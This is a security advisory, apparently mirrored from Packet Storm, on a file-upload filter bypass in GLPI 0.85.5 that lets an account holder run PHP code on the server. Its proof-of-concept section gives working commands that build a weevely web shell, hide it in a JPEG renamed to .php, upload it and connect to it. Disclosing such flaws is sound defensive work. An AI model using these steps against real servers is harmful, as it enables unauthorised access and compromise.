Lucene search
K

GLPI 0.85.5 Remote Code Execution / File Upload

🗓️ 07 Oct 2015 00:00:00Reported by Raffaele ForteType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 25 Views

GLPI 0.85.5 RCE through file upload filter bypass allowing attackers to execute arbitrary code on the serve

Code
`# Exploit Title: GLPI 0.85.5 RCE through file upload filter bypass  
# Date: September 7th, 2015  
# Exploit Author: Raffaele Forte <[email protected]>  
# Vendor Homepage: http://www.glpi-project.org/  
# Software Link: https://forge.glpi-project.org/attachments/download/2093/glpi-0.85.5.tar.gz  
# Version: GLPI 0.85.5  
# Tested on: CentOS release 6.7 (Final), PHP 5.3.3  
  
  
I. INTRODUCTION  
========================================================================  
  
GLPI is the Information Resource-Manager with an additional   
Administration-Interface. You can use it to build up a database with an   
inventory for your company (computer, software, printers...). It has   
enhanced functions to make the daily life for the administrators easier,   
like a job-tracking-system with mail-notification and methods to build a   
database with basic information about your network-topology.  
  
  
II. DESCRIPTION  
========================================================================  
  
  
The application allows users to upgrade their own profile. The user has   
the possibility to add a new photo as attachment.  
  
The photo that he uploads will be stored into "GLPI_ROOT/files/_pictures/".   
  
This file, for example named "photo.jpeg", will be directly accessible   
through "http://host/GLPI_ROOT/files/_pictures/XXXX.jpeg", where "XXXX"   
is an ID automatically generated by the system and visible in the HTML   
source code.  
  
Besides, the server does not check the extension of the uploaded file,   
but only the first bytes within it, that indicates which kind of file is.  
  
Exploiting this flaw, an attacker may upload a tampered jpeg file that   
contains php code placed at the end of the file, so that, just changing   
the file extention to ".php", by default the php code will be interpreted!  
  
To trigger this vulnerability it is necessary to have an account.  
  
This vulnerability is a combination of two issues:  
- predictable uploaded file names and path  
- upload of any kind of file, not limited to images  
  
  
III. PROOF OF CONCEPT  
========================================================================  
  
Generate backdoor:  
  
user@backbox:~$ weevely generate pass123 /tmp/bd.php  
user@backbox:~$ file /tmp/photo.jpeg   
/tmp/photo.jpeg: JPEG image data, JFIF standard 1.02  
user@backbox:~$ cat /tmp/bd.php >> /tmp/photo.jpeg  
user@backbox:~$ mv /tmp/photo.jpeg /tmp/photo.php  
  
Upload the new tampered photo in GLPI > Settings  
  
Run terminal to the target:  
  
user@backbox:~$ weevely http://host/GLPI_ROOT/files/_pictures/XXXX.php pass123  
  
  
IV. BUSINESS IMPACT  
========================================================================  
By uploading a interpretable php file, an attacker may be able to   
execute arbitrary code on the server.  
  
This flaw may compromise the integrity of the system and/or expose   
sensitive information.  
  
  
V. SYSTEMS AFFECTED  
========================================================================  
GLPI Version 0.85.5 is vulnerable (probably all previous versions)  
  
  
VI. VULNERABILITY HISTORY  
========================================================================  
September 7th, 2015: Vulnerability identification  
September 25th, 2015: Vendor notification  
  
  
VII. LEGAL NOTICES  
========================================================================  
The information contained within this advisory is supplied "as-is" with   
no warranties or guarantees of fitness of use or otherwise. We accept no  
responsibility for any damage caused by the use or misuseof this   
information.  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation